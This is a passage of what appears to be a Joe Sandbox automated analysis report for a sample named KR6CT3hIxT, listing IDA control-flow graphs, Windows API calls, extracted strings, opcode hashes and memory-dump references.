                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                    • String ID:
                    • API String ID: 474548282-0
                    • Opcode ID: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
                    • Instruction ID: a8a343b5244f3ff4d60aa2ac993e161e858a0eeb8a98368b21185a91204746b6
                    • Opcode Fuzzy Hash: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
                    • Instruction Fuzzy Hash: C861C462B0864281EB11EB24E88236DA361FF857B4F904732EAAD436D8DFBCD584C751

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3590 7ff7e1db5e24-7ff7e1db6129 call 7ff7e1dc833c call 7ff7e1dc85f0 3596 7ff7e1db612e-7ff7e1db6132 3590->3596 3597 7ff7e1db6141-7ff7e1db6171 call 7ff7e1dc83d8 call 7ff7e1dc8570 call 7ff7e1dc8528 3596->3597 3598 7ff7e1db6134-7ff7e1db613c call 7ff7e1db6fcc 3596->3598 3616 7ff7e1db6973-7ff7e1db6976 call 7ff7e1db466c 3597->3616 3617 7ff7e1db6177-7ff7e1db6179 3597->3617 3603 7ff7e1db697b 3598->3603 3605 7ff7e1db697e-7ff7e1db6985 3603->3605 3607 7ff7e1db69b4-7ff7e1db69e3 call 7ff7e1de2320 3605->3607 3608 7ff7e1db6987-7ff7e1db6998 3605->3608 3610 7ff7e1db69af call 7ff7e1de220c 3608->3610 3611 7ff7e1db699a-7ff7e1db69ad 3608->3611 3610->3607 3611->3610 3614 7ff7e1db69e4-7ff7e1db69e9 call 7ff7e1de7904 3611->3614 3624 7ff7e1db69ea-7ff7e1db69ef call 7ff7e1de7904 3614->3624 3616->3603 3617->3616 3620 7ff7e1db617f-7ff7e1db6189 3617->3620 3620->3616 3623 7ff7e1db618f-7ff7e1db6192 3620->3623 3623->3616 3625 7ff7e1db6198-7ff7e1db61aa call 7ff7e1dc85f0 3623->3625 3631 7ff7e1db69f0-7ff7e1db69f7 call 7ff7e1de7904 3624->3631 3625->3598 3630 7ff7e1db61ac-7ff7e1db61fd call 7ff7e1dc84f8 call 7ff7e1dc8528 * 2 3625->3630 3640 7ff7e1db623f-7ff7e1db6249 3630->3640 3641 7ff7e1db61ff-7ff7e1db6222 call 7ff7e1db466c call 7ff7e1dbba0c 3630->3641 3642 7ff7e1db6266-7ff7e1db6270 3640->3642 3643 7ff7e1db624b-7ff7e1db6260 call 7ff7e1dc8528 3640->3643 3641->3640 3658 7ff7e1db6224-7ff7e1db622e call 7ff7e1db433c 3641->3658 3646 7ff7e1db6272-7ff7e1db627b call 7ff7e1dc8528 3642->3646 3647 7ff7e1db627e-7ff7e1db6296 call 7ff7e1db334c 3642->3647 3643->3616 3643->3642 3646->3647 3656 7ff7e1db62b3 3647->3656 3657 7ff7e1db6298-7ff7e1db629b 3647->3657 3660 7ff7e1db62b6-7ff7e1db62c8 3656->3660 3657->3656 3659 7ff7e1db629d-7ff7e1db62b1 3657->3659 3658->3640 3659->3656 3659->3660 3662 7ff7e1db68b7-7ff7e1db6929 call 7ff7e1dc4d04 call 7ff7e1dc8528 3660->3662 3663 7ff7e1db62ce-7ff7e1db62d1 3660->3663 3682 7ff7e1db6936 3662->3682 3683 7ff7e1db692b-7ff7e1db6934 call 7ff7e1dc8528 3662->3683 3664 7ff7e1db6481-7ff7e1db64f4 call 7ff7e1dc4c74 call 7ff7e1dc8528 * 2 3663->3664 3665 7ff7e1db62d7-7ff7e1db62da 3663->3665 3696 7ff7e1db64f6-7ff7e1db6500 3664->3696 3697 7ff7e1db6507-7ff7e1db6533 call 7ff7e1dc8528 3664->3697 3665->3664 3667 7ff7e1db62e0-7ff7e1db62e3 3665->3667 3670 7ff7e1db62e5-7ff7e1db62e8 3667->3670 3671 7ff7e1db632e-7ff7e1db6353 call 7ff7e1dc8528 3667->3671 3674 7ff7e1db696d-7ff7e1db6971 3670->3674 3675 7ff7e1db62ee-7ff7e1db6329 call 7ff7e1dc8528 3670->3675 3686 7ff7e1db6355-7ff7e1db638f call 7ff7e1db4228 call 7ff7e1db3c84 call 7ff7e1db701c call 7ff7e1db1fa0 3671->3686 3687 7ff7e1db639e-7ff7e1db63c5 call 7ff7e1dc8528 call 7ff7e1dc8384 3671->3687 3674->3605 3675->3674 3689 7ff7e1db6939-7ff7e1db6946 3682->3689 3683->3689 3733 7ff7e1db6390-7ff7e1db6399 call 7ff7e1db1fa0 3686->3733 3709 7ff7e1db6402-7ff7e1db641f call 7ff7e1dc8444 3687->3709 3710 7ff7e1db63c7-7ff7e1db6400 call 7ff7e1db4228 call 7ff7e1db3c84 call 7ff7e1db701c call 7ff7e1db1fa0 3687->3710 3694 7ff7e1db6948-7ff7e1db694a 3689->3694 3695 7ff7e1db694c 3689->3695 3694->3695 3700 7ff7e1db694f-7ff7e1db6959 3694->3700 3695->3700 3696->3697 3711 7ff7e1db6535-7ff7e1db6544 call 7ff7e1dc83d8 call 7ff7e1dcf134 3697->3711 3712 7ff7e1db6549-7ff7e1db6557 3697->3712 3700->3674 3701 7ff7e1db695b-7ff7e1db6968 call 7ff7e1db4840 3700->3701 3701->3674 3729 7ff7e1db6421-7ff7e1db646f call 7ff7e1dc8444 * 2 call 7ff7e1dcc800 call 7ff7e1de4a70 3709->3729 3730 7ff7e1db6475-7ff7e1db647c 3709->3730 3710->3733 3711->3712 3714 7ff7e1db6572-7ff7e1db6595 call 7ff7e1dc8528 3712->3714 3715 7ff7e1db6559-7ff7e1db656c call 7ff7e1dc83d8 3712->3715 3734 7ff7e1db65a0-7ff7e1db65b0 3714->3734 3735 7ff7e1db6597-7ff7e1db659e 3714->3735 3715->3714 3729->3730 3730->3674 3733->3687 3740 7ff7e1db65b3-7ff7e1db65eb call 7ff7e1dc8528 * 2 3734->3740 3735->3740 3754 7ff7e1db65f6-7ff7e1db65fa 3740->3754 3755 7ff7e1db65ed-7ff7e1db65f4 3740->3755 3757 7ff7e1db6603-7ff7e1db6632 3754->3757 3758 7ff7e1db65fc 3754->3758 3755->3757 3760 7ff7e1db663f 3757->3760 3761 7ff7e1db6634-7ff7e1db6638 3757->3761 3758->3757 3763 7ff7e1db6641-7ff7e1db6656 3760->3763 3761->3760 3762 7ff7e1db663a-7ff7e1db663d 3761->3762 3762->3763 3764 7ff7e1db66ca 3763->3764 3765 7ff7e1db6658-7ff7e1db665b 3763->3765 3767 7ff7e1db66d2-7ff7e1db6731 call 7ff7e1db3d00 call 7ff7e1dc8444 call 7ff7e1dd0d54 3764->3767 3765->3764 3766 7ff7e1db665d-7ff7e1db6683 3765->3766 3766->3767 3768 7ff7e1db6685-7ff7e1db66a9 3766->3768 3778 7ff7e1db6745-7ff7e1db6749 3767->3778 3779 7ff7e1db6733-7ff7e1db6740 call 7ff7e1db4840 3767->3779 3770 7ff7e1db66b2-7ff7e1db66bf 3768->3770 3771 7ff7e1db66ab 3768->3771 3770->3767 3774 7ff7e1db66c1-7ff7e1db66c8 3770->3774 3771->3770 3774->3767 3781 7ff7e1db675b-7ff7e1db6772 call 7ff7e1de797c 3778->3781 3782 7ff7e1db674b-7ff7e1db6756 call 7ff7e1db473c 3778->3782 3779->3778 3788 7ff7e1db6774 3781->3788 3789 7ff7e1db6777-7ff7e1db677e 3781->3789 3787 7ff7e1db6859-7ff7e1db6860 3782->3787 3790 7ff7e1db6862-7ff7e1db6872 call 7ff7e1db433c 3787->3790 3791 7ff7e1db6873-7ff7e1db687b 3787->3791 3788->3789 3792 7ff7e1db6780-7ff7e1db6783 3789->3792 3793 7ff7e1db67a3-7ff7e1db67ba call 7ff7e1de797c 3789->3793 3790->3791 3791->3674 3798 7ff7e1db6881-7ff7e1db6892 3791->3798 3794 7ff7e1db6785 3792->3794 3795 7ff7e1db679c 3792->3795 3806 7ff7e1db67bf-7ff7e1db67c6 3793->3806 3807 7ff7e1db67bc 3793->3807 3799 7ff7e1db6788-7ff7e1db6791 3794->3799 3795->3793 3802 7ff7e1db6894-7ff7e1db68a7 3798->3802 3803 7ff7e1db68ad-7ff7e1db68b2 call 7ff7e1de220c 3798->3803 3799->3793 3805 7ff7e1db6793-7ff7e1db679a 3799->3805 3802->3631 3802->3803 3803->3674 3805->3795 3805->3799 3806->3787 3809 7ff7e1db67cc-7ff7e1db67cf 3806->3809 3807->3806 3810 7ff7e1db67d1 3809->3810 3811 7ff7e1db67e8-7ff7e1db67f0 3809->3811 3812 7ff7e1db67d4-7ff7e1db67dd 3810->3812 3811->3787 3813 7ff7e1db67f2-7ff7e1db6826 call 7ff7e1dc8360 call 7ff7e1dc8598 call 7ff7e1dc8528 3811->3813 3812->3787 3814 7ff7e1db67df-7ff7e1db67e6 3812->3814 3813->3787 3821 7ff7e1db6828-7ff7e1db6839 3813->3821 3814->3811 3814->3812 3822 7ff7e1db6854 call 7ff7e1de220c 3821->3822 3823 7ff7e1db683b-7ff7e1db684e 3821->3823 3822->3787 3823->3624 3823->3822
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID:
                    • String ID: CMT
                    • API String ID: 0-2756464174
                    • Opcode ID: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
                    • Instruction ID: db46eaabb116fefb1e52670d86a308d0855d05afd9476dabeb7731a30ebdcca3
                    • Opcode Fuzzy Hash: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
                    • Instruction Fuzzy Hash: 8642E222B08A8166EB18EB74C1527FDA7A1EB11744F800137DB2F93696DFB8F558C352
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
                    • Instruction ID: 07d0540bea2d9aa13d0000a9d0f6dbdda166bdcf92d1e02c99cc38c2ebeeff3a
                    • Opcode Fuzzy Hash: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
                    • Instruction Fuzzy Hash: 67E12622A082828AEB65EF29A0463BDB790FB44748F85523ADB4E47B45DF7CE541C713
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42ae873f8167721f5f2066597c1632663bc2c9996c3b34b327fe22a5c50172c8
                    • Instruction ID: 6fe71aef71500536b30f8c9c564018e3b5836fa3145e5cb101de8dd16c4bfdbc
                    • Opcode Fuzzy Hash: 42ae873f8167721f5f2066597c1632663bc2c9996c3b34b327fe22a5c50172c8
                    • Instruction Fuzzy Hash: B7B1DFA2B04AC9A2DF58EA66D609BE9A391F744BC4F888137DE0D07740DFBCE155C312
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                    • String ID:
                    • API String ID: 3340455307-0
                    • Opcode ID: 9f1cbd0ae3de128b3baec150e1e4cd931595298ca254ea0b004e55239e899349
                    • Instruction ID: 7ea3d7aa50609a2892ba18118836421dc7a62a076cfd178ca1428aafa587617b
                    • Opcode Fuzzy Hash: 9f1cbd0ae3de128b3baec150e1e4cd931595298ca254ea0b004e55239e899349
                    • Instruction Fuzzy Hash: 05417B22B1465286FB69EF15E90237AA352FBC4788F844436DE0D43794CFBCE442C395

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 7ff7e1dcdfd0-7ff7e1dce024 call 7ff7e1de2450 GetModuleHandleW 3 7ff7e1dce026-7ff7e1dce039 GetProcAddress 0->3 4 7ff7e1dce07b-7ff7e1dce3a5 0->4 7 7ff7e1dce053-7ff7e1dce066 GetProcAddress 3->7 8 7ff7e1dce03b-7ff7e1dce04a 3->8 5 7ff7e1dce503-7ff7e1dce521 call 7ff7e1dc6454 call 7ff7e1dc7df4 4->5 6 7ff7e1dce3ab-7ff7e1dce3b4 call 7ff7e1deb788 4->6 19 7ff7e1dce525-7ff7e1dce52f call 7ff7e1dc51a4 5->19 6->5 15 7ff7e1dce3ba-7ff7e1dce3fd call 7ff7e1dc6454 CreateFileW 6->15 7->4 11 7ff7e1dce068-7ff7e1dce078 7->11 8->7 11->4 22 7ff7e1dce403-7ff7e1dce416 SetFilePointer 15->22 23 7ff7e1dce4f0-7ff7e1dce4fe CloseHandle call 7ff7e1db1fa0 15->23 27 7ff7e1dce564-7ff7e1dce5ac call 7ff7e1de797c call 7ff7e1db129c call 7ff7e1dc8090 call 7ff7e1db1fa0 call 7ff7e1dc32bc 19->27 28 7ff7e1dce531-7ff7e1dce53c call 7ff7e1dcdd88 19->28 22->23 25 7ff7e1dce41c-7ff7e1dce43e ReadFile 22->25 23->5 25->23 29 7ff7e1dce444-7ff7e1dce452 25->29 66 7ff7e1dce5b1-7ff7e1dce5b4 27->66 28->27 39 7ff7e1dce53e-7ff7e1dce562 CompareStringW 28->39 32 7ff7e1dce800-7ff7e1dce807 call 7ff7e1de2624 29->32 33 7ff7e1dce458-7ff7e1dce4ac call 7ff7e1de797c call 7ff7e1db129c 29->33 48 7ff7e1dce4c3-7ff7e1dce4d9 call 7ff7e1dcd0a0 33->48 39->27 42 7ff7e1dce5bd-7ff7e1dce5c6 39->42 42->19 45 7ff7e1dce5cc 42->45 49 7ff7e1dce5d1-7ff7e1dce5d4 45->49 61 7ff7e1dce4db-7ff7e1dce4eb call 7ff7e1db1fa0 * 2 48->61 62 7ff7e1dce4ae-7ff7e1dce4be call 7ff7e1dcdd88 48->62 52 7ff7e1dce5d6-7ff7e1dce5d9 49->52 53 7ff7e1dce63f-7ff7e1dce642 49->53 58 7ff7e1dce5dd-7ff7e1dce62d call 7ff7e1de797c call 7ff7e1db129c call 7ff7e1dc8090 call 7ff7e1db1fa0 call 7ff7e1dc32bc 52->58 56 7ff7e1dce7c2-7ff7e1dce7ff call 7ff7e1db1fa0 * 2 call 7ff7e1de2320 53->56 57 7ff7e1dce648-7ff7e1dce65b call 7ff7e1dc7eb0 call 7ff7e1dc51a4 53->57 82 7ff7e1dce706-7ff7e1dce753 call 7ff7e1dcda98 AllocConsole 57->82 83 7ff7e1dce661-7ff7e1dce701 call 7ff7e1dcdd88 * 2 call 7ff7e1dcaae0 call 7ff7e1dcda98 call 7ff7e1dcaae0 call 7ff7e1dcdc2c call 7ff7e1dd87ac call 7ff7e1db19e0 57->83 107 7ff7e1dce62f-7ff7e1dce638 58->107 108 7ff7e1dce63c 58->108 61->23 62->48 72 7ff7e1dce5b6 66->72 73 7ff7e1dce5ce 66->73 72->42 73->49 93 7ff7e1dce755-7ff7e1dce7aa GetCurrentProcessId AttachConsole call 7ff7e1dce868 call 7ff7e1dce858 GetStdHandle WriteConsoleW Sleep FreeConsole 82->93 94 7ff7e1dce7b0 82->94 100 7ff7e1dce7b4-7ff7e1dce7bb call 7ff7e1db19e0 ExitProcess 83->100 93->94 94->100 107->58 112 7ff7e1dce63a 107->112 108->53 112->53
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                    • API String ID: 1496594111-2013832382
                    • Opcode ID: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
                    • Instruction ID: 32932c0cfe82c29662527589559043fbdc7af572901f36bd777a6103f1f21f33
                    • Opcode Fuzzy Hash: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
                    • Instruction Fuzzy Hash: B7323031A09B8295EB15EF20E8422E9B3A5FF48354FD00237EA4D46769EFBCD264C751
                    APIs
                      • Part of subcall function 00007FF7E1DC8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DC8F8D
                    • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E1DC9F75
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DCA42F
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DCA435
                      • Part of subcall function 00007FF7E1DD0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7E1DD0B44), ref: 00007FF7E1DD0BE9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                    • API String ID: 3629253777-3268106645
                    • Opcode ID: 96347e7981fae7733940ad93ba4258564ebec1a9a55cc8409c872ccb2165f156
                    • Instruction ID: 6baf61932d86a4676fedd8aee2fc606b0a1e7a64d5eb0a45136baac8c0fa9c56
                    • Opcode Fuzzy Hash: 96347e7981fae7733940ad93ba4258564ebec1a9a55cc8409c872ccb2165f156
                    • Instruction Fuzzy Hash: B462E222A1969281EB14EF24C4463FDA365FB40784FC09933EA4E476D5EFBCE545C3A2

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1911 7ff7e1de1900-7ff7e1de1989 call 7ff7e1de1558 1914 7ff7e1de19b4-7ff7e1de19d1 1911->1914 1915 7ff7e1de198b-7ff7e1de19af call 7ff7e1de1868 RaiseException 1911->1915 1917 7ff7e1de19d3-7ff7e1de19e4 1914->1917 1918 7ff7e1de19e6-7ff7e1de19ea 1914->1918 1921 7ff7e1de1bb8-7ff7e1de1bd5 1915->1921 1920 7ff7e1de19ed-7ff7e1de19f9 1917->1920 1918->1920 1922 7ff7e1de19fb-7ff7e1de1a0d 1920->1922 1923 7ff7e1de1a1a-7ff7e1de1a1d 1920->1923 1935 7ff7e1de1a13 1922->1935 1936 7ff7e1de1b89-7ff7e1de1b93 1922->1936 1924 7ff7e1de1ac4-7ff7e1de1acb 1923->1924 1925 7ff7e1de1a23-7ff7e1de1a26 1923->1925 1927 7ff7e1de1adf-7ff7e1de1ae2 1924->1927 1928 7ff7e1de1acd-7ff7e1de1adc 1924->1928 1929 7ff7e1de1a3d-7ff7e1de1a52 LoadLibraryExA 1925->1929 1930 7ff7e1de1a28-7ff7e1de1a3b 1925->1930 1931 7ff7e1de1b85 1927->1931 1932 7ff7e1de1ae8-7ff7e1de1aec 1927->1932 1928->1927 1933 7ff7e1de1a54-7ff7e1de1a67 GetLastError 1929->1933 1934 7ff7e1de1aa9-7ff7e1de1ab2 1929->1934 1930->1929 1930->1934 1931->1936 1938 7ff7e1de1b1b-7ff7e1de1b2e GetProcAddress 1932->1938 1939 7ff7e1de1aee-7ff7e1de1af2 1932->1939 1940 7ff7e1de1a7e-7ff7e1de1aa4 call 7ff7e1de1868 RaiseException 1933->1940 1941 7ff7e1de1a69-7ff7e1de1a7c 1933->1941 1944 7ff7e1de1ab4-7ff7e1de1ab7 FreeLibrary 1934->1944 1945 7ff7e1de1abd 1934->1945 1935->1923 1942 7ff7e1de1b95-7ff7e1de1ba6 1936->1942 1943 7ff7e1de1bb0 call 7ff7e1de1868 1936->1943 1938->1931 1950 7ff7e1de1b30-7ff7e1de1b43 GetLastError 1938->1950 1939->1938 1947 7ff7e1de1af4-7ff7e1de1aff 1939->1947 1940->1921 1941->1934 1941->1940 1942->1943 1953 7ff7e1de1bb5 1943->1953 1944->1945 1945->1924 1947->1938 1951 7ff7e1de1b01-7ff7e1de1b08 1947->1951 1955 7ff7e1de1b45-7ff7e1de1b58 1950->1955 1956 7ff7e1de1b5a-7ff7e1de1b81 call 7ff7e1de1868 RaiseException call 7ff7e1de1558 1950->1956 1951->1938 1957 7ff7e1de1b0a-7ff7e1de1b0f 1951->1957 1953->1921 1955->1931 1955->1956 1956->1931 1957->1938 1959 7ff7e1de1b11-7ff7e1de1b19 1957->1959 1959->1931 1959->1938
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                    • String ID: H
                    • API String ID: 3432403771-2852464175
                    • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                    • Instruction ID: c53f53fc05a32c142553f17c5d3a8c095b2b77a133945727a056f5a8ee3bfd7e
                    • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                    • Instruction Fuzzy Hash: 4E916B22F04B118AEB14DF61D8457ACB3A0FB08B89F848136CE0D47758EFB8E555C322

                    Control-flow Graph

                    • Executed
                    • Not Executed
